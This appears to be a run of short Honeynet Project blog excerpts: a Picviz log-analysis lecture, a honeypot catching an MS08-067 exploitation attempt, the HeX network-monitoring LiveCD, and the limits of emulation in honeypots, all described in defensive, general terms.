I gave a lecture on Picviz during the Usenix Workshop on the Analysis of System Logs (WASL 2008).

My slides ‘Picviz: finding a needle in a haystack’ are available right here.

I also ran for the Cray log analysis contest analysis. Slides of stuff I discovered are here.

I lost the contest by 1 vote only, but I was fighting against someone who knew a lot about Cray. He had in my opinion a better talk than mine, but I just started the contest after my morning lecture and I preferred talking with people during lunch than doing the contest ;-)

(This article was originally published at http://honeytrap.mwcollect.org/msexploit.)

If you followed IT security related blogs or mailinglists lately, you are aware that a critical server service vulnerability in Microsoft operating systems was published recently. I’m not going to talk about the details here, there are great resources available elsewhere (and the “reversing the ms08-067 patch” article isn’t the only advice about exploiting holes you get on that page).

OK, what have we got this time? One of our honeytrap sensors caught an MS08-067 exploitation attempt today which we take as an example to show how to perform a quick analysis and check what it does. If you want to play along, get the (sanitized) pcap from here.

As effort of the Honeynet Project Malaysian chapter and the RawPacket team initiative, HeX LiveCD was created. It is a Network Security Monitoring (NSM) centric Live CD, built based on the principles of NSM, for analysts, by analysts. This project will be eventually forked to Hex Sensor and Hex Server to complete the cycle of NSM processes. Besides, HeX LiveCD is the blueprint for HornyD. HornyD and HoneySuckle are the toolkits for the Malaysia Distributed Honeynet Project.

Emulation is an important technology in honeypots and honeynets. It’s not always what we want, though, and here’s why. As you might know, most bots perform attacks in multiple stages, i.e., they

• send some exploit code to the victim that opens a shell,
• connect to that shell or let the shell connect back,
• invoke commands to download the actual malware binary,
• execute the malware.

Catching the exploit and providing a fake shell isn’t too hard, as shown in this post. But we certainly don’t want a malware to get executed on our honeypot, not even in an emulated environment. Instead, we want to do different things with it, e.g., submit it to a central service for automated analysis.